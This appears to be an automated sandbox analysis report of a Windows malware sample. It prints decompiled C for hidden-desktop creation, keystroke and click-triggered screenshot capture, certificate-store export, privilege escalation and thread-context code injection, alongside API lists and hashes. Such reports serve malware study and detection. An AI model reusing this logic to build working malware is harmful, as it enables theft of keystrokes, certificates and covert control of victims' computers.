Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
String ID: $RFB $RFB 003.003$x
API String ID: 3911805420-914445781
Opcode ID: 49d5f6d6148f3d1cd33864147e0ee774c0ea18f9f30d4ed1ce20a60ccccd41b4
Instruction ID: 5511e90b34acd8e29d5fa6664ad75ce6362559d06cdab88b0433b204dcc25f2d
Opcode Fuzzy Hash: 49d5f6d6148f3d1cd33864147e0ee774c0ea18f9f30d4ed1ce20a60ccccd41b4
Instruction Fuzzy Hash: 3E323571E102199BDF24DBA4C851BFE7BB5EF44304F04412BEA61E72A2DB7C8985C798

Uniqueness

Uniqueness Score: -1.00%

Function 004090BA, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090BA(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				E00419DD3(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E00409092(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E00419DD3(0xcd, _t37);
					}
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E0040904D(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E00409092(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}

0x004090ba
0x004090c5
0x004090cd
0x004090d0
0x004090df
0x004090e5
0x004090ea
0x00409103
0x0040910c
0x00409116
0x004091a1
0x004091a4
0x004091aa
0x004091b1
0x004091b1
0x0040911c
0x0040911f
0x00409124
0x00409126
0x00409129
0x00409133
0x00409133
0x00409144
0x00409148
0x0040915e
0x00409174
0x00409184
0x00409184
0x00409188
0x00409189
0x00409192
0x00000000
0x00000000
0x00000000
0x00409192
0x00409177
0x0040917d
0x00409182
0x00000000
0x00000000
0x00000000
0x0040914a
0x00409158
0x0040915a
0x0040915c
0x00409194
0x00409194
0x00409197
0x0040919c
0x0040919c
0x00000000
0x00409197
0x00000000
0x0040915c
0x00409148
0x004090f2
0x004090f8
0x004090fb
0x004090fd
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 004090DF
CreateWindowStationW.USER32 ref: 004090F2
GetProcessWindowStation.USER32(?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409103
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040913E
CreateDesktopW.USER32 ref: 00409152
GetCurrentThreadId.KERNEL32 ref: 0040915E
GetThreadDesktop.USER32(00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409165
SetThreadDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409177
CloseDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409189
CloseWindowStation.USER32(?,?,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 004091A4

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
String ID:
API String ID: 2917431391-0
Opcode ID: 94c05638b91f17ec2a3f21bfdf7eb3fe139a00ea282614daecfe9fe8ed487feb
Instruction ID: b849f5420282c2517e0d2d0dd82cac4b07f708afd5df827c598018cb40128f7f
Opcode Fuzzy Hash: 94c05638b91f17ec2a3f21bfdf7eb3fe139a00ea282614daecfe9fe8ed487feb
Instruction Fuzzy Hash: E1214F75900259BFEF106BA59C8C99F7F68EB45388F04407AF901B7262D6394D458A68

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1BF, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041D1BF(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				signed int _t32;
				void* _t36;
				intOrPtr _t39;
				WCHAR* _t45;
				MSG* _t54;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t54 = _a4;
				if(_t54 == 0 || E00406473() == 0) {
					L20:
					return TranslateMessage(_t54);
				} else {
					_t25 = _t54->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t54->wParam - 0x1b;
						if(_t54->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_push( &_v884);
								L19:
								E0041D022();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t54->wParam - 8;
						if(_t54->wParam != 8) {
							goto L17;
						}
						_push(0x404c38);
						goto L19;
					}
					EnterCriticalSection(0x424010);
					if( *0x424008 > 0) {
						 *0x424008 =  *0x424008 + 0xffff;
						_t36 = 2;
						E00419DD3(_t36,  &_v864);
						_t39 = E0041A1A9( &_v864, 0x1e, 0x1f4);
						_v900 = _t39;
						if(_t39 != 0) {
							E00419DD3(0,  &_v840);
							_t65 =  &_v884;
							E00419DD3(1, _t65);
							_t45 =  *0x423e74;
							if(_t45 != 0) {
								_t65 = _t45;
							}
							E004126B4( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E0040B9F9(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x4227a0, GetTickCount());
						}
					}
					LeaveCriticalSection(0x424010);
					goto L20;
				}
			}

0x0041d1c5
0x0041d1cc
0x0041d1d3
0x0041d315
0x0041d322
0x0041d1e6
0x0041d1e6
0x0041d1ee
0x0041d2a4
0x0041d2a9
0x00000000
0x00000000
0x0041d2ab
0x0041d2af
0x00000000
0x00000000
0x0041d2b6
0x0041d2bc
0x0041d2be
0x00000000
0x00000000
0x0041d2de
0x0041d2e4
0x0041d2e6
0x00000000
0x00000000
0x0041d2e8
0x0041d2eb
0x0041d2fa
0x0041d304
0x0041d304
0x0041d306
0x0041d30f
0x0041d310
0x0041d310
0x00000000
0x0041d310
0x0041d2fc
0x0041d2fc
0x0041d302
0x00000000
0x00000000
0x00000000
0x0041d302
0x0041d2ed
0x0041d2f1
0x00000000
0x00000000
0x0041d2f3
0x00000000
0x0041d2f3
0x0041d1f9
0x0041d207
0x0041d212
0x0041d21f
0x0041d220
0x0041d22f
0x0041d234
0x0041d23a
0x0041d242
0x0041d249
0x0041d24e
0x0041d253
0x0041d25a
0x0041d25c
0x0041d25c
0x0041d27d
0x0041d282
0x0041d28c
0x0041d294
0x0041d294
0x0041d23a
0x0041d29c
0x00000000
0x0041d29c

APIs

TranslateMessage.USER32(?), ref: 0041D316

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

EnterCriticalSection.KERNEL32(00424010), ref: 0041D1F9
LeaveCriticalSection.KERNEL32(00424010), ref: 0041D29C

Part of subcall function 0041A1A9: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A1DB
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A1EC
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A1F9
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A206
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A213
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A220
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A22D
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A23A
Part of subcall function 0041A1A9: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A282
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A28D
Part of subcall function 0041A1A9: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A29F
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A2AA
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A2B6
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A2C3
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A2D0
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A2DD
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A2EA
Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A2F7

GetTickCount.KERNEL32 ref: 0041D25E
GetKeyboardState.USER32(?), ref: 0041D2B6
ToUnicode.USER32 ref: 0041D2DE

Strings

, xrefs: 0041D2FC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: a0e8fae3d2d758044487d9a8063dc74ba889240b67623f6146865977907b9de9
Instruction ID: 6d932b5759b52da30b2a44be7f9c9da87e3c67bca1a0d9cde2be08cd8e8ced19
Opcode Fuzzy Hash: a0e8fae3d2d758044487d9a8063dc74ba889240b67623f6146865977907b9de9
Instruction Fuzzy Hash: 0831C2B1A003059BDB20AF64DC49ADB77B8EB48304F04483BFA64E7191DB78D8C5879E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6E6, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00403408), ref: 0040C701
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C71D
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040C729
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C768
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C798
CharLowerW.USER32(?,?,00000000,00000001), ref: 0040C7B6
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0040C7C1
CertCloseStore.CRYPT32(?,00000000), ref: 0040C84A

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: 91bb8b32d5dff269fd845b61f1ec64dd6b086ada7dcff7f4a268aea9fc6baf91
Instruction ID: eee9b3b908420dca936445f80bd5713386a219e54e77bef1342df4e3b33a77d7
Opcode Fuzzy Hash: 91bb8b32d5dff269fd845b61f1ec64dd6b086ada7dcff7f4a268aea9fc6baf91
Instruction Fuzzy Hash: 6741A872108341EBD711AF65DD80AAF7BDCAB84344F004A3FF584F21A1D638DD4587AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A01E, Relevance: 12.1, APIs: 8, Instructions: 116
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A01E() {
				long _v564;
				char _v568;
				void* _v572;
				char _v576;
				void* _v580;
				void* _v584;
				void* _v588;
				char _v589;
				signed int _v592;
				signed int _v596;
				char _v597;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t56;
				intOrPtr* _t57;
				void** _t59;
				void** _t60;
				void** _t62;
				long _t67;
				int _t74;
				void** _t76;
				void* _t79;

				_t74 = 0;
				_v589 = 0;
				_v584 = 0;
				_v588 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t74);
					_v584 = _t42;
					_v580 = _t74;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v568;
						_v568 = 0x22c;
						Process32FirstW(_v584, _t45);
					}
					while(_t45 != 0) {
						_t67 = _v564;
						__eflags = _t67 - _t74;
						if(_t67 <= _t74) {
							L20:
							_t45 = Process32NextW(_v588,  &_v572);
							continue;
						}
						__eflags = _t67 -  *0x4227a0; // 0x0
						if(__eflags == 0) {
							goto L20;
						}
						_t47 = 0;
						__eflags = _v596 - _t74;
						if(_v596 <= _t74) {
							L8:
							_t48 = E00406296(_t67, _t72, _t67);
							_v584 = _t48;
							__eflags = _t48 - _t74;
							if(_t48 == _t74) {
								goto L20;
							}
							_t79 = OpenProcess(0x400, _t74, _v564);
							__eflags = _t79 - _t74;
							if(_t79 == _t74) {
								L19:
								CloseHandle(_v580);
								goto L20;
							}
							_t76 = E00412FD8(_t67, _t79,  &_v576);
							CloseHandle(_t79);
							__eflags = _t76;
							if(_t76 == 0) {
								L18:
								_t74 = 0;
								__eflags = 0;
								goto L19;
							} else {
								__eflags = _v576 -  *0x422540; // 0x0
								if(__eflags == 0) {
									_t56 = GetLengthSid( *_t76);
									__eflags = _t56 -  *0x422538;
									if(_t56 ==  *0x422538) {
										_t57 =  *0x422534; // 0x0
										_t59 = E00411A32( *_t57,  *_t76, _t56);
										__eflags = _t59;
										if(_t59 == 0) {
											_t60 = E0041194C(4 + _v596 * 4,  &_v592);
											__eflags = _t60;
											if(_t60 != 0) {
												_t72 = _v596;
												_v596 = _v596 + 1;
												_v584 = _v584 + 1;
												 *((intOrPtr*)(_v592 + _v596 * 4)) = _v564;
												_t62 = E00419F95(_v592, _v564, _v580);
												__eflags = _t62;
												if(_t62 != 0) {
													_v597 = 1;
												}
											}
										}
									}
								}
								E004119C1(_t76);
								goto L18;
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t72 = _v592;
							__eflags =  *((intOrPtr*)(_t72 + _t47 * 4)) - _t67;
							if( *((intOrPtr*)(_t72 + _t47 * 4)) == _t67) {
								goto L20;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - _v596;
							if(_t47 < _v596) {
								continue;
							}
							goto L8;
						}
						goto L20;
					}
					CloseHandle(_v588);
					if(_v584 != _t74) {
						continue;
					}
					break;
				}
				E004119C1(_v588);
				return _v597;
			}

0x0041a033
0x0041a035
0x0041a03a
0x0041a03e
0x0041a042
0x0041a045
0x0041a04b
0x0041a04f
0x0041a056
0x00000000
0x0041a05c
0x0041a05c
0x0041a065
0x0041a06d
0x0041a06d
0x0041a17d
0x0041a078
0x0041a07c
0x0041a07e
0x0041a16e
0x0041a177
0x00000000
0x0041a177
0x0041a084
0x0041a08a
0x00000000
0x00000000
0x0041a090
0x0041a092
0x0041a096
0x0041a0ac
0x0041a0ad
0x0041a0b2
0x0041a0b6
0x0041a0b8
0x00000000
0x00000000
0x0041a0ce
0x0041a0d0
0x0041a0d2
0x0041a168
0x0041a16c
0x00000000
0x0041a16c
0x0041a0e4
0x0041a0e6
0x0041a0e8
0x0041a0ea
0x0041a166
0x0041a166
0x0041a166
0x00000000
0x0041a0ec
0x0041a0f0
0x0041a0f6
0x0041a0fa
0x0041a100
0x0041a106
0x0041a10b
0x0041a112
0x0041a117
0x0041a119
0x0041a12a
0x0041a12f
0x0041a131
0x0041a133
0x0041a143
0x0041a147
0x0041a14b
0x0041a152
0x0041a157
0x0041a159
0x0041a15b
0x0041a15b
0x0041a159
0x0041a131
0x0041a119
0x0041a106
0x0041a161
0x00000000
0x0041a161
0x00000000
0x00000000
0x00000000
0x0041a098
0x0041a098
0x0041a098
0x0041a09c
0x0041a09f
0x00000000
0x00000000
0x0041a0a5
0x0041a0a6
0x0041a0aa
0x00000000
0x00000000
0x00000000
0x0041a0aa
0x00000000
0x0041a098
0x0041a189
0x0041a18f
0x00000000
0x00000000
0x00000000
0x0041a18f
0x0041a199
0x0041a1a8

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041A045
Process32FirstW.KERNEL32 ref: 0041A06D
OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C), ref: 0041A0C8
CloseHandle.KERNEL32(00000000,00000000,?), ref: 0041A0E6
GetLengthSid.ADVAPI32(00000000), ref: 0041A0FA
CloseHandle.KERNEL32(?), ref: 0041A16C
Process32NextW.KERNEL32(?,?), ref: 0041A177
CloseHandle.KERNEL32(?), ref: 0041A189

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: e04d1511fa3e966b90ac0db0fb08dd2fc2b67ae554bc567e3e00ab5a443b6adf
Instruction ID: 927509cd7e2e9630669f0e31b38bab1e95e05c35ba268d9a56f8afc6c579c2a7
Opcode Fuzzy Hash: e04d1511fa3e966b90ac0db0fb08dd2fc2b67ae554bc567e3e00ab5a443b6adf
Instruction Fuzzy Hash: 8B418970109301AFC711EF24D9849ABBBE5FFC8304F14092EF598A2260D7749CA9CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004170EA, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004170EA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E00417246("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E00416E4B( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00417246( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E004170EA( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x00417107
0x0041710b
0x0041710f
0x00417116
0x0041723d
0x00417243
0x00417243
0x00417129
0x0041712f
0x00417136
0x0041713c
0x00417145
0x00417145
0x0041714a
0x00000000
0x00000000
0x0041716c
0x0041721c
0x0041722d
0x00000000
0x00000000
0x00000000
0x0041722d
0x00417176
0x00417179
0x00417182
0x00000000
0x00000000
0x00000000
0x00000000
0x00417189
0x00417189
0x0041718c
0x004171c9
0x004171ce
0x004171ee
0x004171f2
0x004171f7
0x004171f7
0x00417217
0x00417217
0x00000000
0x004171ce
0x0041718e
0x004171a4
0x004171a8
0x00000000
0x00000000
0x00000000
0x004171aa
0x004171b7
0x004171ba
0x004171bc
0x00000000
0x00000000
0x004171be
0x004171c2
0x004171c7
0x004171c7
0x00000000
0x004171c2
0x00417179
0x00417237
0x00417237

APIs

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
Sleep.KERNEL32(00000000), ref: 004171C7
Sleep.KERNEL32(00000000,?,?), ref: 004171F7
FindNextFileW.KERNEL32(?,?), ref: 00417225
FindClose.KERNEL32(?), ref: 00417237

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: 244c1ca3ec9d188044de67639d68d8ecd5dca176ec41c65d72f172fe7c792a5a
Instruction ID: a53325d9b501d9e2584a95d6f72ca3c5641cd5b704c9dc2a96b84840a9c2b85b
Opcode Fuzzy Hash: 244c1ca3ec9d188044de67639d68d8ecd5dca176ec41c65d72f172fe7c792a5a
Instruction Fuzzy Hash: CE415F3100820AABCF21DF54CD44ADF7BB5FF48344F14492AF994922A1D739C9DACB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041308D, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041308D(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x00413098
0x004130ac
0x004130cb
0x004130d3
0x004130e2
0x00413103
0x00413103
0x00413108
0x00000000
0x004130c0
0x00000000
0x004130c0

APIs

GetCurrentThread.KERNEL32 ref: 0041309D
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130A4
OpenProcessToken.ADVAPI32(000000FF,00000020,0041C599,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130B6
LookupPrivilegeValueW.ADVAPI32(00000000,0041C599,?), ref: 004130DA
AdjustTokenPrivileges.ADVAPI32(0041C599,00000000,00000001,00000000,00000000,00000000), ref: 004130EF
GetLastError.KERNEL32 ref: 004130F9
CloseHandle.KERNEL32(0041C599), ref: 00413108

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: 13214aad1df67a814eb6fbe14b4250ab1e340ce23e1a7e3f06e1c727fc1f9093
Instruction ID: d39284f023ce2c939f220344915e2f30821d3e3f710d10412c709711af44d6d0
Opcode Fuzzy Hash: 13214aad1df67a814eb6fbe14b4250ab1e340ce23e1a7e3f06e1c727fc1f9093
Instruction Fuzzy Hash: EF011E75600208BFEB109FA5DD89EEFBFBCEB04745F004066F611F21A0E7748A849A39

Uniqueness

Uniqueness Score: -1.00%

Function 00408DB8, Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00408DB8(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;
				void* _t65;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x422554(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E00406473() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E00406296(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E00406388(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x422544 + E00406B06;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							_t65 = _v720.Eip -  *0x42255c; // 0x77a2ba60
							if(_t65 != 0) {
								goto L12;
							} else {
								if(( *0x422530 & 0x00000010) != 0) {
									_t55 = _t55 ^ _v720.Eax;
								}
								_v720.Eax = _t55;
								_v720.ContextFlags = 0x10002;
								if(SetThreadContext( *_t50,  &_v720) == 0) {
									goto L12;
								}
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x00408db8
0x00408dc5
0x00408de4
0x00408dea
0x00408def
0x00408e2f
0x00408e34
0x00408e37
0x00408e39
0x00408e3f
0x00408e46
0x00408e4b
0x00408e4e
0x00408e56
0x00408e62
0x00408e68
0x00408e7a
0x00408ebc
0x00408ec8
0x00408e7c
0x00408e82
0x00408e88
0x00000000
0x00408e8a
0x00408e91
0x00408e93
0x00408e93
0x00408ea2
0x00408ea8
0x00408eba
0x00000000
0x00000000
0x00408eba
0x00408e88
0x00408ed1
0x00408ed8
0x00408e39
0x00408ede

APIs

